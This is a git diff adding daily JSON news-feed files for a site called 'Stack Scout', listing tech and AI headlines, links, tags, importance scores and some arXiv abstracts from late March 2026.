"title": "Mamba-3", + "url": "https://www.together.ai/blog/mamba-3", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.87, + "date": "2026-03-17T00:00:00.000Z", + "summary": "Meet Mamba-3: the SSM built for inference. 
Faster than Transformers at decode, stronger than Mamba-2, and open-source from day one.", + "category": "tech_general" + }, + { + "title": "Iran launched unsuccessful attack on UK's Diego Garcia", + "url": "https://www.bbc.com/news/articles/c5yljdgwppzo", + "source": "Hacker News", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 0.84, + "date": "2026-03-21T14:54:38.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: Termcraft – terminal-first 2D sandbox survival in Rust", + "url": "https://github.com/pagel-s/termcraft", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-21T18:42:38.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Atuin v18.13 – better search, a PTY proxy, and AI for your shell", + "url": "https://blog.atuin.sh/atuin-v18-13/", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-21T10:35:20.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "purl: a curl-esque CLI for making HTTP requests that require payment", + "url": "https://www.purl.dev/", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-21T02:09:08.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Floci – A free, open-source local AWS emulator", + "url": "https://github.com/hectorvent/floci", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.6799999999999999, + "date": "2026-03-21T21:49:15.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-22.json b/data/news-feed-2026-03-22.json new file mode 100644 index 0000000..0aac51b --- /dev/null +++ 
b/data/news-feed-2026-03-22.json @@ -0,0 +1,115 @@ +{ + "generated": "2026-06-05T00:44:29.763Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-22", + "article_count": 7, + "archived_story_count": 88, + "articles": [ + { + "title": "Elon Musk unveils chip manufacturing plans for SpaceX and Tesla", + "url": "https://techcrunch.com/2026/03/22/elon-musk-unveils-chip-manufacturing-plans-for-spacex-and-tesla/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-03-22T16:20:00.000Z", + "summary": "Elon Musk recently outlined ambitious plans for a chip-building collaboration Tesla and SpaceX — but he has a history of overpromising.", + "category": "ai_tools" + }, + { + "title": "Show HN: A Markdown file that turns your AI agent into an autonomous researcher", + "url": "https://github.com/krzysztofdudek/ResearcherSkill", + "source": "Hacker News", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 0.9199999999999999, + "date": "2026-03-22T18:21:48.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "HopTab–free,open source macOS app switcher and tiler that replaces Cmd+Tab", + "url": "https://www.royalbhati.com/hoptab", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.7599999999999999, + "date": "2026-03-22T06:23:59.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Training Center for Maneuvering on Manned Model Ships", + "url": "https://www.portrevel.com/", + "source": "Hacker News", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 0.7599999999999999, + "date": "2026-03-20T12:04:49.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "$ teebot.dev – from terminal to tee in 6 seconds", + "url": "https://teebot.dev", + 
"source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-22T12:22:50.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "How to Attract AI Bots to Your Open Source Project", + "url": "https://nesbitt.io/2026/03/21/how-to-attract-ai-bots-to-your-open-source-project.html", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.6799999999999999, + "date": "2026-03-21T20:58:01.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Node.js worker threads are problematic, but they work great for us", + "url": "https://www.inngest.com/blog/node-worker-threads", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.62, + "date": "2026-03-18T16:51:51.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-23.json b/data/news-feed-2026-03-23.json new file mode 100644 index 0000000..ad4a6fb --- /dev/null +++ b/data/news-feed-2026-03-23.json @@ -0,0 +1,55 @@ +{ + "generated": "2026-06-05T00:44:29.984Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-23", + "article_count": 3, + "archived_story_count": 82, + "articles": [ + { + "title": "The Download: animal welfare gets AGI-pilled, and the White House unveils its AI policy", + "url": "https://www.technologyreview.com/2026/03/23/1134509/the-download-animal-welfare-agi-pilled-white-house-unveils-ai-policy/", + "source": "MIT Tech Review AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.8800000000000001, + "date": "2026-03-23T12:17:33.000Z", + "summary": "This is today’s edition of The Download, our weekday newsletter that provides a daily dose of what’s going on in the world of technology. 
The Bay Area’s animal welfare movement wants to recruit AI  In early February, animal welfare advocates and AI researchers arrived in stocking feet at Mox, a scrappy, shoes-free coworking space in…", + "category": "ai_research" + }, + { + "title": "Show HN: Agent Kernel – Three Markdown files that make any AI agent stateful", + "url": "https://github.com/oguzbilgic/agent-kernel", + "source": "Hacker News", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 0.78, + "date": "2026-03-23T07:06:42.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "The way CTRL-C in Postgres CLI cancels queries is incredibly hack-y", + "url": "https://neon.com/blog/ctrl-c-in-psql-gives-me-the-heebie-jeebies", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-20T13:21:51.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-24.json b/data/news-feed-2026-03-24.json new file mode 100644 index 0000000..4770e19 --- /dev/null +++ b/data/news-feed-2026-03-24.json @@ -0,0 +1,145 @@ +{ + "generated": "2026-06-05T00:44:30.177Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-24", + "article_count": 9, + "archived_story_count": 101, + "articles": [ + { + "title": "Google TV’s new Gemini features keep fans updated on sports teams and more", + "url": "https://techcrunch.com/2026/03/24/google-tv-new-gemini-features-keep-fans-updated-on-sports-teams-deep-dives-visual-answers/", + "source": "TechCrunch AI", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-03-24T19:12:11.000Z", + "summary": "Three Gemini-powered features are coming to your Google TV. 
This includes visual responses, deep dives, and sports briefs.", + "category": "ai_tools" + }, + { + "title": "OpenAI adds open source tools to help developers build for teen safety", + "url": "https://techcrunch.com/2026/03/24/openai-adds-open-source-tools-to-help-developers-build-for-teen-safety/", + "source": "TechCrunch AI", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.94, + "date": "2026-03-24T18:41:34.000Z", + "summary": "Rather than working from scratch to figure out how to make AI safer for teens, developers can use these policies to fortify what they build.", + "category": "ai_tools" + }, + { + "title": "Sunsetting the Techempower Framework Benchmarks", + "url": "https://github.com/TechEmpower/FrameworkBenchmarks/issues/10932", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.82, + "date": "2026-03-24T01:54:03.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Self-propagating malware poisons open source software and wipes Iran-based machines", + "url": "https://arstechnica.com/security/2026/03/self-propagating-malware-poisons-open-source-software-and-wipes-iran-based-machines/", + "source": "Ars Technica AI", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.7599999999999999, + "date": "2026-03-24T12:38:09.000Z", + "summary": "Development houses: It's time to check your networks for infections.", + "category": "tech_general" + }, + { + "title": "Qite.js – Frontend framework for people who hate React and love HTML", + "url": "https://qitejs.qount25.dev", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.7599999999999999, + "date": "2026-03-19T13:49:12.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Nanobrew: The fastest macOS package manager compatible with brew", 
+ "url": "https://nanobrew.trilok.ai/", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.7, + "date": "2026-03-24T11:40:21.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "A retro terminal music player inspired by Winamp", + "url": "https://github.com/bjarneo/cliamp", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-23T20:42:22.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: Gridland: make terminal apps that also run in the browser", + "url": "https://www.gridland.io/", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.62, + "date": "2026-03-24T16:57:47.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Log File Viewer for the Terminal", + "url": "https://lnav.org/", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.62, + "date": "2026-03-24T05:32:53.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-25.json b/data/news-feed-2026-03-25.json new file mode 100644 index 0000000..d98f4ec --- /dev/null +++ b/data/news-feed-2026-03-25.json @@ -0,0 +1,115 @@ +{ + "generated": "2026-06-05T00:44:30.352Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-25", + "article_count": 7, + "archived_story_count": 95, + "articles": [ + { + "title": "Google launches Lyria 3 Pro music generation model", + "url": "https://techcrunch.com/2026/03/25/google-launches-lyria-3-pro-music-generation-model/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-03-25T16:37:43.000Z", + "summary": "Google is launching 
Lyria 3 Pro, an upgraded music model that generates longer, more customizable tracks, as it expands AI music tools across Gemini, enterprise products, and other services.", + "category": "ai_tools" + }, + { + "title": "Meta launches new initiative to support entrepreneurship, drive AI adoption", + "url": "https://techcrunch.com/2026/03/25/meta-launches-new-initiative-to-support-entrepreneurship-drive-ai-adoption/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-03-25T14:45:20.000Z", + "summary": "Meta CEO Mark Zuckerberg said in a memo to staff that small businesses have always been a big part of the company's business model, and that while tens of millions of entrepreneurs already use its platforms to grow and connect with customers, the company wants to do more in the space.", + "category": "ai_tools" + }, + { + "title": "Google unveils TurboQuant, a new AI memory compression algorithm — and yes, the internet is calling it ‘Pied Piper’", + "url": "https://techcrunch.com/2026/03/25/google-turboquant-ai-memory-compression-silicon-valley-pied-piper/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.77, + "date": "2026-03-25T20:38:45.000Z", + "summary": "Google’s TurboQuant has the internet joking about Pied Piper from HBO's \"Silicon Valley.\" The compression algorithm promises to shrink AI’s “working memory” by up to 6x, but it’s still just a lab experiment for now.", + "category": "ai_tools" + }, + { + "title": "Building a coding agent in Swift from scratch", + "url": "https://github.com/ivan-magda/swift-claude-code", + "source": "Hacker News", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 0.7, + "date": "2026-03-25T10:45:40.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: DuckDB community extension for 
prefiltered HNSW using ACORN-1", + "url": "https://github.com/cigrainger/duckdb-hnsw-acorn", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.7, + "date": "2026-03-25T03:28:04.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Rendering complex scripts in terminal and OSC 66", + "url": "https://thottingal.in/blog/2026/03/22/complex-scripts-in-terminal/", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-22T09:31:08.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Open source isn't a tip jar – it's time to charge for access", + "url": "https://www.theregister.com/2026/03/25/open_source_bill_opinion/", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.6799999999999999, + "date": "2026-03-25T11:59:36.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-26.json b/data/news-feed-2026-03-26.json new file mode 100644 index 0000000..9ea7028 --- /dev/null +++ b/data/news-feed-2026-03-26.json @@ -0,0 +1,119 @@ +{ + "generated": "2026-06-05T00:44:30.591Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-26", + "article_count": 7, + "archived_story_count": 95, + "articles": [ + { + "title": "Cohere launches an open source voice model specifically for transcription", + "url": "https://techcrunch.com/2026/03/26/cohere-launches-an-open-source-voice-model-specifically-for-transcription/", + "source": "TechCrunch AI", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-03-26T13:30:00.000Z", + "summary": "Relatively light at just 2 billion parameters, the model is meant for use with 
consumer-grade GPUs for those who want to self-host it. It currently supports 14 languages.", + "category": "ai_tools" + }, + { + "title": "Mistral releases a new open source model for speech generation", + "url": "https://techcrunch.com/2026/03/26/mistral-releases-a-new-open-source-model-for-speech-generation/", + "source": "TechCrunch AI", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-03-26T11:30:00.000Z", + "summary": "The model, which lets enterprises build voice agents for sales and customer engagement, puts Mistral in direct competition with the likes of ElevenLabs, Deepgram, and OpenAI.", + "category": "ai_tools" + }, + { + "title": "Intel Announces Arc Pro B70 and Arc Pro B65 GPUs", + "url": "https://www.techpowerup.com/347703/intel-announces-arc-pro-b70-and-arc-pro-b65-gpus-maxes-out-xe2-battlemage-architecture", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.9199999999999999, + "date": "2026-03-26T14:36:04.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: I put an AI agent on a $7/month VPS with IRC as its transport layer", + "url": "https://georgelarson.me/writing/2026-03-23-nullclaw-doorman/", + "source": "Hacker News", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 0.78, + "date": "2026-03-26T22:41:25.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: Relay – The open-source Claude Cowork for OpenClaw", + "url": "https://github.com/SeventeenLabs/relay", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.71, + "date": "2026-03-26T10:23:12.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Stripe Projects: Provision and manage services from the CLI", + "url": 
"https://projects.dev/", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-26T16:00:57.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Shell Tricks That Make Life Easier (and Save Your Sanity)", + "url": "https://blog.hofstede.it/shell-tricks-that-actually-make-life-easier-and-save-your-sanity/", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-26T00:28:38.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-27.json b/data/news-feed-2026-03-27.json new file mode 100644 index 0000000..f1338e9 --- /dev/null +++ b/data/news-feed-2026-03-27.json @@ -0,0 +1,87 @@ +{ + "generated": "2026-06-05T00:44:30.771Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-27", + "article_count": 5, + "archived_story_count": 86, + "articles": [ + { + "title": "Nashville library launches Memory Lab for digitizing home movies", + "url": "https://www.axios.com/local/nashville/2026/03/16/nashville-library-digitize-home-movies", + "source": "Hacker News", + "tags": [ + "product_launch", + "developer_tool" + ], + "matching_tags": [ + "product_launch", + "developer_tool" + ], + "importance": 0.84, + "date": "2026-03-24T04:22:15.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: Open-Source Animal Crossing–Style UI for Claude Code Agents", + "url": "https://github.com/outworked/outworked/releases/tag/v0.3.0", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.7699999999999999, + "date": "2026-03-27T17:25:05.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Telnyx package compromised on PyPI", + "url": 
"https://www.aikido.dev/blog/telnyx-pypi-compromised-teampcp-canisterworm", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.7, + "date": "2026-03-27T18:13:57.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Telnyx package compromised on PyPI", + "url": "https://telnyx.com/resources/telnyx-python-sdk-supply-chain-security-notice-march-2026", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.7, + "date": "2026-03-27T08:57:02.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: Minimalist library to generate SVG views of scientific data", + "url": "https://github.com/alefore/mini_svg/", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.7, + "date": "2026-03-23T17:54:51.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-28.json b/data/news-feed-2026-03-28.json new file mode 100644 index 0000000..aa285c8 --- /dev/null +++ b/data/news-feed-2026-03-28.json @@ -0,0 +1,70 @@ +{ + "generated": "2026-06-05T00:44:30.984Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-28", + "article_count": 4, + "archived_story_count": 67, + "articles": [ + { + "title": "Arm releases first in-house chip, with Meta as debut customer", + "url": "https://www.cnbc.com/2026/03/24/arm-launches-its-own-cpu-with-meta-as-first-customer.html", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.9199999999999999, + "date": "2026-03-24T23:34:06.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Improving personal tax filing with Claude CLI and Obsidian", + "url": 
"https://www.mrafayaleem.com/blog/improving-personal-tax-filing-with-claude-obsidian", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.73, + "date": "2026-03-28T18:21:52.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Improved Git Diffs with Delta, Fzf and a Little Shell Scripting", + "url": "https://nickjanetakis.com/blog/awesome-git-diffs-with-delta-fzf-and-a-little-shell-scripting", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-24T15:02:38.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "OpenCiv1 – open-source rewrite of Civ1", + "url": "https://github.com/rajko-horvat/OpenCiv1", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.6799999999999999, + "date": "2026-03-28T18:22:45.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-29.json b/data/news-feed-2026-03-29.json new file mode 100644 index 0000000..b79c584 --- /dev/null +++ b/data/news-feed-2026-03-29.json @@ -0,0 +1,55 @@ +{ + "generated": "2026-06-05T00:44:31.207Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-29", + "article_count": 3, + "archived_story_count": 57, + "articles": [ + { + "title": "Figma's MCP Update Reflects a Larger Industry Shift", + "url": "https://metedata.substack.com/p/a-small-figma-update-and-a-big-signal", + "source": "Hacker News", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 0.8200000000000001, + "date": "2026-03-29T15:46:26.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "OpenYak – An open-source Cowork that runs any model and owns your filesystem", + "url": "https://github.com/openyak/desktop", + "source": "Hacker News", + 
"tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.82, + "date": "2026-03-29T04:26:13.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Pretext: TypeScript library for multiline text measurement and layout", + "url": "https://github.com/chenglou/pretext", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.7, + "date": "2026-03-28T16:52:45.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-30.json b/data/news-feed-2026-03-30.json new file mode 100644 index 0000000..5e30e14 --- /dev/null +++ b/data/news-feed-2026-03-30.json @@ -0,0 +1,40 @@ +{ + "generated": "2026-06-05T00:44:31.348Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-30", + "article_count": 2, + "archived_story_count": 75, + "articles": [ + { + "title": "There are more AI health tools than ever—but how well do they work?", + "url": "https://www.technologyreview.com/2026/03/30/1134795/there-are-more-ai-health-tools-than-ever-but-how-well-do-they-work/", + "source": "MIT Tech Review AI", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 0.9099999999999999, + "date": "2026-03-30T16:00:00.000Z", + "summary": "Earlier this month, Microsoft launched Copilot Health, a new space within its Copilot app where users will be able to connect their medical records and ask specific questions about their health. 
A couple of days earlier, Amazon had announced that Health AI, an LLM-based tool previously restricted to members of its One Medical service, would…", + "category": "ai_research" + }, + { + "title": "Build123d: A Python CAD programming library", + "url": "https://github.com/gumyr/build123d", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.49, + "date": "2026-03-29T20:58:22.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-31.json b/data/news-feed-2026-03-31.json new file mode 100644 index 0000000..80ba701 --- /dev/null +++ b/data/news-feed-2026-03-31.json @@ -0,0 +1,271 @@ +{ + "generated": "2026-06-05T00:44:31.546Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-31", + "article_count": 15, + "archived_story_count": 533, + "articles": [ + { + "title": "A Regression Framework for Understanding Prompt Component Impact on LLM Performance", + "url": "https://arxiv.org/abs/2603.26830", + "source": "ArXiv cs.LG (ML)", + "tags": [ + "open_source", + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "open_source", + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-03-31T04:00:00.000Z", + "summary": "arXiv:2603.26830v1 Announce Type: new Abstract: As large language models (LLMs) continue to improve and see further integration into software systems, so does the need to understand the conditions in which they will perform. We contribute a statistical framework for understanding the impact of specific prompt features on LLM performance. The approach extends previous explainable artificial intelligence (XAI) methods specifically to inspect LLMs by fitting regression models relating portions of the prompt to LLM evaluation. 
We apply our method to compare how two open-source models, Mistral-7B and GPT-OSS-20B, leverage the prompt to perform a simple arithmetic problem. Regression models of individual prompt portions explain 72% and 77% of variation in model performances, respectively. We find misinformation in the form of incorrect example query-answer pairs impedes both models from solving the arithmetic query, though positive examples do not find significant variability in the impact of positive and negative instructions - these prompts have contradictory effects on model performance. The framework serves as a tool for decision makers in critical scenarios to gain granular insight into how the prompt influences an LLM to solve a task.", + "category": "ai_research" + }, + { + "title": "LangChain Announces Enterprise Agentic AI Platform Built with NVIDIA", + "url": "https://blog.langchain.com/nvidia-enterprise/", + "source": "LangChain Blog", + "tags": [ + "product_launch", + "open_source", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-03-16T21:31:28.000Z", + "summary": "Comprehensive agent engineering platform combined with NVIDIA AI enables enterprises to build, deploy, and monitor production-grade AI agents at scale Press Release SAN FRANCISCO, March 16, 2026 /PRNewswire/ — LangChain, the agent engineering company behind LangSmith and open-source frameworks that have surpassed 1 billion downloads, today announced a comprehensive integration", + "category": "ai_agents" + }, + { + "title": "Systematic debugging for AI agents: Introducing the AgentRx framework", + "url": "https://www.microsoft.com/en-us/research/blog/systematic-debugging-for-ai-agents-introducing-the-agentrx-framework/", + "source": "Microsoft Research Blog", + "tags": [ + "api_update", + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "agent_tool" + ], + "importance": 1, + "date": 
"2026-03-12T16:38:45.000Z", + "summary": "As AI agents transition from simple chatbots to autonomous systems capable of managing cloud incidents, navigating complex web interfaces, and executing multi-step API workflows, a new challenge has emerged: transparency. When a human makes a mistake, we can usually trace the logic. But when an AI agent fails, perhaps by hallucinating a tool output or […] The post Systematic debugging for AI agents: Introducing the AgentRx framework appeared first on Microsoft Research .", + "category": "ai_research" + }, + { + "title": "Autonomous context compression", + "url": "https://blog.langchain.com/autonomous-context-compression/", + "source": "LangChain Blog", + "tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-03-11T18:24:27.000Z", + "summary": "TL;DR: We've added a tool to the Deep Agents SDK (Python) and CLI that allows models to compress their own context windows at opportune times. Motivation Context compression is an action that reduces the information in an agent’s working memory. Older messages are replaced by", + "category": "ai_agents" + }, + { + "title": "Squish and Release: Exposing Hidden Hallucinations by Making Them Surface as Safety Signals", + "url": "https://arxiv.org/abs/2603.26829", + "source": "ArXiv cs.LG (ML)", + "tags": [ + "product_launch", + "developer_tool" + ], + "matching_tags": [ + "product_launch", + "developer_tool" + ], + "importance": 1, + "date": "2026-03-31T04:00:00.000Z", + "summary": "arXiv:2603.26829v1 Announce Type: new Abstract: Language models detect false premises when asked directly but absorb them under conversational pressure, producing authoritative professional output built on errors they already identified. 
This failure - order-gap hallucination - is invisible to output inspection because the error migrates into the activation space of the safety circuit, suppressed but not erased. We introduce Squish and Release (S&R), an activation-patching architecture with two components: a fixed detector body (layers 24-31, the localized safety evaluation circuit) and a swappable detector core (an activation vector controlling perception direction). A safety core shifts the model from compliance toward detection; an absorb core reverses it. We evaluate on OLMo-2 7B using the Order-Gap Benchmark - 500 chains across 500 domains, all manually graded. Key findings: cascade collapse is near-total (99.8% compliance at O5); the detector body is binary and localized (layers 24-31 shift 93.6%, layers 0-23 contribute zero, p<10^-189); a synthetically engineered core releases 76.6% of collapsed chains; detection is the more stable attractor (83% restore vs 58% suppress); and epistemic specificity is confirmed (false-premise core releases 45.4%, true-premise core releases 0.0%). The contribution is the framework - body/core architecture, benchmark, and core engineering methodology - which is model-agnostic by design.", + "category": "ai_research" + }, + { + "title": "A Step Toward Federated Pretraining of Multimodal Large Language Models", + "url": "https://arxiv.org/abs/2603.26786", + "source": "ArXiv cs.LG (ML)", + "tags": [ + "product_launch", + "developer_tool" + ], + "matching_tags": [ + "product_launch", + "developer_tool" + ], + "importance": 1, + "date": "2026-03-31T04:00:00.000Z", + "summary": "arXiv:2603.26786v1 Announce Type: new Abstract: The rapid evolution of Multimodal Large Language Models (MLLMs) is bottlenecked by the saturation of high-quality public data, while vast amounts of diverse multimodal data remain inaccessible in privacy-sensitive silos. 
Federated Learning (FL) offers a promising solution to unlock these distributed resources, but existing research focuses predominantly on fine-tuning, leaving the foundational pre-training phase largely unexplored. In this paper, we formally introduce the Federated MLLM Alignment (Fed-MA) task, a lightweight pre-training paradigm that freezes the vision encoder and LLM while collaboratively training the cross-modal projector. We identify two critical challenges in this setting: (i) parameter interference in aggregating local projectors; and (ii) gradient oscillations in one-pass collaborative SGD. To address these challenges, we propose Fed-CMP, a pioneering framework for federated MLLM pre-training. Fed-CMP employs Canonical Reliability-Aware Aggregation, which constructs a canonical space to decompose client projectors into a shared alignment basis and client-specific coefficients, then performs reliability-weighted fusion to suppress parameter interference. Furthermore, Fed-CMP introduces Orthogonality-Preserved Momentum, which applies momentum to the shared alignment basis via orthogonal projection, accumulating historical optimization directions while preserving geometric structure. We construct four federated pre-training scenarios based on public datasets, and extensive experiments validate that Fed-CMP significantly outperforms existing baselines.", + "category": "ai_research" + }, + { + "title": "TED: Training-Free Experience Distillation for Multimodal Reasoning", + "url": "https://arxiv.org/abs/2603.26778", + "source": "ArXiv cs.LG (ML)", + "tags": [ + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-03-31T04:00:00.000Z", + "summary": "arXiv:2603.26778v1 Announce Type: new 